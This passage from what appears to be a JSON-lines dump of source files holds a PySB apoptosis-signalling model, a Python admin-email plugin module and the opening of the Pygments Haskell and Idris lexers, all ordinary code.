1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)\nParameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)\nParameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)\nParameter('pore_formation_0_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_0_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_1_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_1_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_2_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_2_BaxA_pore_1kr', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr', 1.0)\nParameter('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc', 
1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf', 1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr', 1.0)\nParameter('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('C6A_0', 0.0)\nParameter('BaxA_0', 0.0)\nParameter('Ligand_0', 1000.0)\nParameter('C6pro_0', 100.0)\nParameter('ParpU_0', 1000000.0)\nParameter('BidU_0', 171000.0)\nParameter('BidT_0', 0.0)\nParameter('C3A_0', 0.0)\nParameter('BidM_0', 0.0)\nParameter('BaxM_0', 40000.0)\nParameter('C8A_0', 0.0)\nParameter('Xiap_0', 50750.0)\nParameter('Receptor_0', 100.0)\nParameter('C3ub_0', 0.0)\nParameter('Fadd_0', 130000.0)\nParameter('C3pro_0', 21000.0)\nParameter('SmacM_0', 100000.0)\nParameter('SmacC_0', 0.0)\nParameter('C8pro_0', 130000.0)\nParameter('ParpC_0', 0.0)\n\nObservable('C6A_obs', C6A())\nObservable('BaxA_obs', BaxA())\nObservable('Ligand_obs', Ligand())\nObservable('C6pro_obs', C6pro())\nObservable('ParpU_obs', ParpU())\nObservable('BidU_obs', BidU())\nObservable('BidT_obs', BidT())\nObservable('C3A_obs', C3A())\nObservable('BidM_obs', BidM())\nObservable('BaxM_obs', BaxM())\nObservable('C8A_obs', C8A())\nObservable('Xiap_obs', Xiap())\nObservable('Receptor_obs', Receptor())\nObservable('C3ub_obs', C3ub())\nObservable('Fadd_obs', Fadd())\nObservable('C3pro_obs', C3pro())\nObservable('SmacM_obs', SmacM())\nObservable('SmacC_obs', SmacC())\nObservable('C8pro_obs', C8pro())\nObservable('ParpC_obs', ParpC())\n\nRule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)\nRule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)\nRule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None, C6A=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)\nRule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None, C3pro=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)\nRule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None, C3pro=None) + BidU(C8A=None) | C8A(BidU=1, C3pro=None) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)\nRule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1, C3pro=None) % BidU(C8A=1) >> C8A(BidU=None, C3pro=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)\nRule('inhibition_0_SmacC_inhibitor_Xiap_inh_target', SmacC(Xiap=None) + Xiap(SmacC=None, C3A=None) | SmacC(Xiap=1) % Xiap(SmacC=1, C3A=None), inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf, inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr)\nRule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, C3A=None) + C3A(Xiap=None, ParpU=None, C6pro=None) | Xiap(SmacC=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, 
catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)\nRule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None) >> Xiap(SmacC=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)\nRule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None, C6pro=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)\nRule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)\nRule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)\nRule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)\nRule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)\nRule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)\nRule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)\nRule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) | BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)\nRule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None) | BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)\nRule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) + BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None), pore_formation_2_BaxA_pore_2kf, pore_formation_2_BaxA_pore_1kr)\nRule('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % 
BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None) + SmacM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=5) % SmacM(BaxA=5), transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf, transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr)\nRule('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=5) % SmacM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None) + SmacC(Xiap=None), transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc)\nRule('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=None) + C3pro(C8A=None) | C8A(BidU=None, C3pro=1) % C3pro(C8A=1), catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr)\nRule('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=1) % C3pro(C8A=1) >> C8A(BidU=None, C3pro=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc)\nRule('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=None) + C6pro(C3A=None) | C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1), catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf, catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr)\nRule('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + C6A(C8pro=None), catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc)\nRule('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=None) + C8pro(Fadd=None, C6A=None) | C6A(C8pro=1) % C8pro(Fadd=None, C6A=1), catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf, catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr)\nRule('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=1) % C8pro(Fadd=None, C6A=1) >> C6A(C8pro=None) + C8A(BidU=None, C3pro=None), catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc)\n\nInitial(C6A(C8pro=None), C6A_0)\nInitial(BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None), BaxA_0)\nInitial(Ligand(Receptor=None), Ligand_0)\nInitial(C6pro(C3A=None), C6pro_0)\nInitial(ParpU(C3A=None), ParpU_0)\nInitial(BidU(C8A=None), BidU_0)\nInitial(BidT(), BidT_0)\nInitial(C3A(Xiap=None, ParpU=None, C6pro=None), C3A_0)\nInitial(BidM(BaxM=None), BidM_0)\nInitial(BaxM(BidM=None, BaxA=None), BaxM_0)\nInitial(C8A(BidU=None, C3pro=None), C8A_0)\nInitial(Xiap(SmacC=None, C3A=None), Xiap_0)\nInitial(Receptor(Ligand=None, Fadd=None), Receptor_0)\nInitial(C3ub(), C3ub_0)\nInitial(Fadd(Receptor=None, C8pro=None), Fadd_0)\nInitial(C3pro(C8A=None), C3pro_0)\nInitial(SmacM(BaxA=None), SmacM_0)\nInitial(SmacC(Xiap=None), SmacC_0)\nInitial(C8pro(Fadd=None, C6A=None), C8pro_0)\nInitial(ParpC(), ParpC_0)\n\n"} {"ext": "py", "sha": "1a2f21a734886d5cebf0d7bfc1fdad145163cde6", "content": "from typing import TYPE_CHECKING\n\nfrom ..email_common import get_email_subject, get_email_template_or_default\nfrom . 
import constants\nfrom .tasks import (\n send_email_with_link_to_download_file_task,\n send_export_failed_email_task,\n send_set_staff_password_email_task,\n send_staff_order_confirmation_email_task,\n send_staff_password_reset_email_task,\n)\n\nif TYPE_CHECKING:\n from .plugin import AdminEmailPlugin\n\n\ndef send_set_staff_password_email(\n payload: dict, config: dict, plugin: \"AdminEmailPlugin\"\n):\n recipient_email = payload[\"recipient_email\"]\n template = get_email_template_or_default(\n plugin,\n constants.SET_STAFF_PASSWORD_TEMPLATE_FIELD,\n constants.SET_STAFF_PASSWORD_DEFAULT_TEMPLATE,\n constants.DEFAULT_EMAIL_TEMPLATES_PATH,\n )\n subject = get_email_subject(\n plugin.configuration,\n constants.SET_STAFF_PASSWORD_SUBJECT_FIELD,\n constants.SET_STAFF_PASSWORD_DEFAULT_SUBJECT,\n )\n send_set_staff_password_email_task.delay(\n recipient_email, payload, config, subject, template\n )\n\n\ndef send_csv_export_success(payload: dict, config: dict, plugin: \"AdminEmailPlugin\"):\n recipient_email = payload.get(\"recipient_email\")\n if recipient_email:\n template = get_email_template_or_default(\n plugin,\n constants.CSV_EXPORT_SUCCESS_TEMPLATE_FIELD,\n constants.CSV_EXPORT_SUCCESS_DEFAULT_TEMPLATE,\n constants.DEFAULT_EMAIL_TEMPLATES_PATH,\n )\n subject = get_email_subject(\n plugin.configuration,\n constants.CSV_EXPORT_SUCCESS_SUBJECT_FIELD,\n constants.CSV_EXPORT_SUCCESS_DEFAULT_SUBJECT,\n )\n send_email_with_link_to_download_file_task.delay(\n recipient_email, payload, config, subject, template\n )\n\n\ndef send_staff_order_confirmation(\n payload: dict, config: dict, plugin: \"AdminEmailPlugin\"\n):\n recipient_list = payload.get(\"recipient_list\")\n template = get_email_template_or_default(\n plugin,\n constants.STAFF_ORDER_CONFIRMATION_TEMPLATE_FIELD,\n constants.STAFF_ORDER_CONFIRMATION_DEFAULT_TEMPLATE,\n constants.DEFAULT_EMAIL_TEMPLATES_PATH,\n )\n subject = get_email_subject(\n plugin.configuration,\n constants.STAFF_ORDER_CONFIRMATION_SUBJECT_FIELD,\n constants.STAFF_ORDER_CONFIRMATION_DEFAULT_SUBJECT,\n )\n send_staff_order_confirmation_email_task.delay(\n recipient_list, payload, config, subject, template\n )\n\n\ndef send_csv_export_failed(payload: dict, config: dict, plugin: \"AdminEmailPlugin\"):\n recipient_email = payload.get(\"recipient_email\")\n if recipient_email:\n template = get_email_template_or_default(\n plugin,\n constants.CSV_EXPORT_FAILED_TEMPLATE_FIELD,\n constants.CSV_EXPORT_FAILED_TEMPLATE_DEFAULT_TEMPLATE,\n constants.DEFAULT_EMAIL_TEMPLATES_PATH,\n )\n subject = get_email_subject(\n plugin.configuration,\n constants.CSV_EXPORT_FAILED_SUBJECT_FIELD,\n constants.CSV_EXPORT_FAILED_DEFAULT_SUBJECT,\n )\n send_export_failed_email_task.delay(\n recipient_email, payload, config, subject, template\n )\n\n\ndef send_staff_reset_password(payload: dict, config: dict, plugin: \"AdminEmailPlugin\"):\n recipient_email = payload.get(\"recipient_email\")\n if recipient_email:\n template = get_email_template_or_default(\n plugin,\n constants.STAFF_PASSWORD_RESET_TEMPLATE_FIELD,\n constants.STAFF_PASSWORD_RESET_DEFAULT_TEMPLATE,\n constants.DEFAULT_EMAIL_TEMPLATES_PATH,\n )\n subject = get_email_subject(\n plugin.configuration,\n constants.STAFF_PASSWORD_RESET_SUBJECT_FIELD,\n constants.STAFF_PASSWORD_RESET_DEFAULT_SUBJECT,\n )\n send_staff_password_reset_email_task.delay(\n recipient_email, payload, config, subject, template\n )\n"} {"ext": "py", "sha": "1a2f221771ff1b30867835352a207e9f01e1e3bd", "content": "# -*- coding: utf-8 -*-\n\"\"\"\n 
pygments.lexers.haskell\n ~~~~~~~~~~~~~~~~~~~~~~~\n\n Lexers for Haskell and related languages.\n\n :copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\"\"\"\n\nimport re\n\nfrom pygments.lexer import Lexer, RegexLexer, bygroups, do_insertions, \\\n default, include\nfrom pygments.token import Text, Comment, Operator, Keyword, Name, String, \\\n Number, Punctuation, Generic\nfrom pygments import unistring as uni\n\n__all__ = ['HaskellLexer', 'IdrisLexer', 'AgdaLexer', 'CryptolLexer',\n 'LiterateHaskellLexer', 'LiterateIdrisLexer', 'LiterateAgdaLexer',\n 'LiterateCryptolLexer', 'KokaLexer']\n\n\nline_re = re.compile('.*?\\n')\n\n\nclass HaskellLexer(RegexLexer):\n \"\"\"\n A Haskell lexer based on the lexemes defined in the Haskell 98 Report.\n\n .. versionadded:: 0.8\n \"\"\"\n name = 'Haskell'\n aliases = ['haskell', 'hs']\n filenames = ['*.hs']\n mimetypes = ['text/x-haskell']\n\n flags = re.MULTILINE | re.UNICODE\n\n reserved = ('case', 'class', 'data', 'default', 'deriving', 'do', 'else',\n 'family', 'if', 'in', 'infix[lr]?', 'instance',\n 'let', 'newtype', 'of', 'then', 'type', 'where', '_')\n ascii = ('NUL', 'SOH', '[SE]TX', 'EOT', 'ENQ', 'ACK',\n 'BEL', 'BS', 'HT', 'LF', 'VT', 'FF', 'CR', 'S[OI]', 'DLE',\n 'DC[1-4]', 'NAK', 'SYN', 'ETB', 'CAN',\n 'EM', 'SUB', 'ESC', '[FGRU]S', 'SP', 'DEL')\n\n tokens = {\n 'root': [\n # Whitespace:\n (r'\\s+', Text),\n # (r'--\\s*|.*$', Comment.Doc),\n (r'--(?![!#$%&*+./<=>?@^|_~:\\\\]).*?$', Comment.Single),\n (r'\\{-', Comment.Multiline, 'comment'),\n # Lexemes:\n # Identifiers\n (r'\\bimport\\b', Keyword.Reserved, 'import'),\n (r'\\bmodule\\b', Keyword.Reserved, 'module'),\n (r'\\berror\\b', Name.Exception),\n (r'\\b(%s)(?!\\')\\b' % '|'.join(reserved), Keyword.Reserved),\n (r\"'[^\\\\]'\", String.Char), # this has to come before the TH quote\n (r'^[_' + uni.Ll + r'][\\w\\']*', Name.Function),\n (r\"'?[_\" + uni.Ll + r\"][\\w']*\", Name),\n (r\"('')?[\" + uni.Lu + r\"][\\w\\']*\", Keyword.Type),\n (r\"(')[\" + uni.Lu + r\"][\\w\\']*\", Keyword.Type),\n (r\"(')\\[[^\\]]*\\]\", Keyword.Type), # tuples and lists get special treatment in GHC\n (r\"(')\\([^)]*\\)\", Keyword.Type), # ..\n # Operators\n (r'\\\\(?![:!#$%&*+.\\\\/<=>?@^|~-]+)', Name.Function), # lambda operator\n (r'(<-|::|->|=>|=)(?![:!#$%&*+.\\\\/<=>?@^|~-]+)', Operator.Word), # specials\n (r':[:!#$%&*+.\\\\/<=>?@^|~-]*', Keyword.Type), # Constructor operators\n (r'[:!#$%&*+.\\\\/<=>?@^|~-]+', Operator), # Other operators\n # Numbers\n (r'\\d+[eE][+-]?\\d+', Number.Float),\n (r'\\d+\\.\\d+([eE][+-]?\\d+)?', Number.Float),\n (r'0[oO][0-7]+', Number.Oct),\n (r'0[xX][\\da-fA-F]+', Number.Hex),\n (r'\\d+', Number.Integer),\n # Character/String Literals\n (r\"'\", String.Char, 'character'),\n (r'\"', String, 'string'),\n # Special\n (r'\\[\\]', Keyword.Type),\n (r'\\(\\)', Name.Builtin),\n (r'[][(),;`{}]', Punctuation),\n ],\n 'import': [\n # Import statements\n (r'\\s+', Text),\n (r'\"', String, 'string'),\n # after \"funclist\" state\n (r'\\)', Punctuation, '#pop'),\n (r'qualified\\b', Keyword),\n # import X as Y\n (r'([' + uni.Lu + r'][\\w.]*)(\\s+)(as)(\\s+)([' + uni.Lu + r'][\\w.]*)',\n bygroups(Name.Namespace, Text, Keyword, Text, Name), '#pop'),\n # import X hiding (functions)\n (r'([' + uni.Lu + r'][\\w.]*)(\\s+)(hiding)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Keyword, Text, Punctuation), 'funclist'),\n # import X (functions)\n (r'([' + uni.Lu + r'][\\w.]*)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Punctuation), 
'funclist'),\n # import X\n (r'[\\w.]+', Name.Namespace, '#pop'),\n ],\n 'module': [\n (r'\\s+', Text),\n (r'([' + uni.Lu + r'][\\w.]*)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Punctuation), 'funclist'),\n (r'[' + uni.Lu + r'][\\w.]*', Name.Namespace, '#pop'),\n ],\n 'funclist': [\n (r'\\s+', Text),\n (r'[' + uni.Lu + r']\\w*', Keyword.Type),\n (r'(_[\\w\\']+|[' + uni.Ll + r'][\\w\\']*)', Name.Function),\n (r'--(?![!#$%&*+./<=>?@^|_~:\\\\]).*?$', Comment.Single),\n (r'\\{-', Comment.Multiline, 'comment'),\n (r',', Punctuation),\n (r'[:!#$%&*+.\\\\/<=>?@^|~-]+', Operator),\n # (HACK, but it makes sense to push two instances, believe me)\n (r'\\(', Punctuation, ('funclist', 'funclist')),\n (r'\\)', Punctuation, '#pop:2'),\n ],\n # NOTE: the next four states are shared in the AgdaLexer; make sure\n # any change is compatible with Agda as well or copy over and change\n 'comment': [\n # Multiline Comments\n (r'[^-{}]+', Comment.Multiline),\n (r'\\{-', Comment.Multiline, '#push'),\n (r'-\\}', Comment.Multiline, '#pop'),\n (r'[-{}]', Comment.Multiline),\n ],\n 'character': [\n # Allows multi-chars, incorrectly.\n (r\"[^\\\\']'\", String.Char, '#pop'),\n (r\"\\\\\", String.Escape, 'escape'),\n (\"'\", String.Char, '#pop'),\n ],\n 'string': [\n (r'[^\\\\\"]+', String),\n (r\"\\\\\", String.Escape, 'escape'),\n ('\"', String, '#pop'),\n ],\n 'escape': [\n (r'[abfnrtv\"\\'&\\\\]', String.Escape, '#pop'),\n (r'\\^[][' + uni.Lu + r'@^_]', String.Escape, '#pop'),\n ('|'.join(ascii), String.Escape, '#pop'),\n (r'o[0-7]+', String.Escape, '#pop'),\n (r'x[\\da-fA-F]+', String.Escape, '#pop'),\n (r'\\d+', String.Escape, '#pop'),\n (r'\\s+\\\\', String.Escape, '#pop'),\n ],\n }\n\n\nclass IdrisLexer(RegexLexer):\n \"\"\"\n A lexer for the dependently typed programming language Idris.\n\n Based on the Haskell and Agda Lexer.\n\n .. 
versionadded:: 2.0\n \"\"\"\n name = 'Idris'\n aliases = ['idris', 'idr']\n filenames = ['*.idr']\n mimetypes = ['text/x-idris']\n\n reserved = ('case', 'class', 'data', 'default', 'using', 'do', 'else',\n 'if', 'in', 'infix[lr]?', 'instance', 'rewrite', 'auto',\n 'namespace', 'codata', 'mutual', 'private', 'public', 'abstract',\n 'total', 'partial',\n 'let', 'proof', 'of', 'then', 'static', 'where', '_', 'with',\n 'pattern', 'term', 'syntax', 'prefix',\n 'postulate', 'parameters', 'record', 'dsl', 'impossible', 'implicit',\n 'tactics', 'intros', 'intro', 'compute', 'refine', 'exact', 'trivial')\n\n ascii = ('NUL', 'SOH', '[SE]TX', 'EOT', 'ENQ', 'ACK',\n 'BEL', 'BS', 'HT', 'LF', 'VT', 'FF', 'CR', 'S[OI]', 'DLE',\n 'DC[1-4]', 'NAK', 'SYN', 'ETB', 'CAN',\n 'EM', 'SUB', 'ESC', '[FGRU]S', 'SP', 'DEL')\n\n directives = ('lib', 'link', 'flag', 'include', 'hide', 'freeze', 'access',\n 'default', 'logging', 'dynamic', 'name', 'error_handlers', 'language')\n\n tokens = {\n 'root': [\n # Comments\n (r'^(\\s*)(%%%s)' % '|'.join(directives),\n bygroups(Text, Keyword.Reserved)),\n (r'(\\s*)(--(?![!#$%&*+./<=>?@^|_~:\\\\]).*?)$', bygroups(Text, Comment.Single)),\n (r'(\\s*)(\\|{3}.*?)$', bygroups(Text, Comment.Single)),\n (r'(\\s*)(\\{-)', bygroups(Text, Comment.Multiline), 'comment'),\n # Declaration\n (r'^(\\s*)([^\\s(){}]+)(\\s*)(:)(\\s*)',\n bygroups(Text, Name.Function, Text, Operator.Word, Text)),\n # Identifiers\n (r'\\b(%s)(?!\\')\\b' % '|'.join(reserved), Keyword.Reserved),\n (r'(import|module)(\\s+)', bygroups(Keyword.Reserved, Text), 'module'),\n (r\"('')?[A-Z][\\w\\']*\", Keyword.Type),\n (r'[a-z][\\w\\']*', Text),\n # Special Symbols\n (r'(<-|::|->|=>|=)', Operator.Word), # specials\n (r'([(){}\\[\\]:!#$%&*+.\\\\/<=>?@^|~-]+)', Operator.Word), # specials\n # Numbers\n (r'\\d+[eE][+-]?\\d+', Number.Float),\n (r'\\d+\\.\\d+([eE][+-]?\\d+)?', Number.Float),\n (r'0[xX][\\da-fA-F]+', Number.Hex),\n (r'\\d+', Number.Integer),\n # Strings\n (r\"'\", String.Char, 'character'),\n (r'\"', String, 'string'),\n (r'[^\\s(){}]+', Text),\n (r'\\s+?', Text), # Whitespace\n ],\n 'module': [\n (r'\\s+', Text),\n (r'([A-Z][\\w.]*)(\\s+)(\\()',\n bygroups(Name.Namespace, Text, Punctuation), 'funclist'),\n (r'[A-Z][\\w.]*', Name.Namespace, '#pop'),\n ],\n 'funclist': [\n (r'\\s+', Text),\n (r'[A-Z]\\w*', Keyword.Type),\n (r'(_[\\w\\']+|[a-z][\\w\\']*)', Name.Function),\n (r'--.*$', Comment.Single),\n (r'\\{-', Comment.Multiline, 'comment'),\n (r',', Punctuation),\n (r'[:!#$%&*+.\\\\/<=>?@^|~-]+', Operator),\n # (HACK, but it makes sense to push two instances, believe me)\n (r'\\(', Punctuation, ('funclist', 'funclist')),\n (r'\\)', Punctuation, '#pop:2'),\n ],\n # NOTE: the next four states are shared in the AgdaLexer; make sure\n # any change is compatible with Agda as well or copy over and change\n 'comment': [\n # Multiline Comments\n (r'[^-{}]+', Comment.Multiline),\n (r'\\{-', Comment.Multiline, '#push'),\n (r'-\\}', Comment.Multiline, '#pop'),\n (r'[-{}]', Comment.Multiline),\n ],\n 'character': [\n # Allows multi-chars, incorrectly.\n (r\"[^\\\\']\", String.Char),\n (r\"\\\\\", 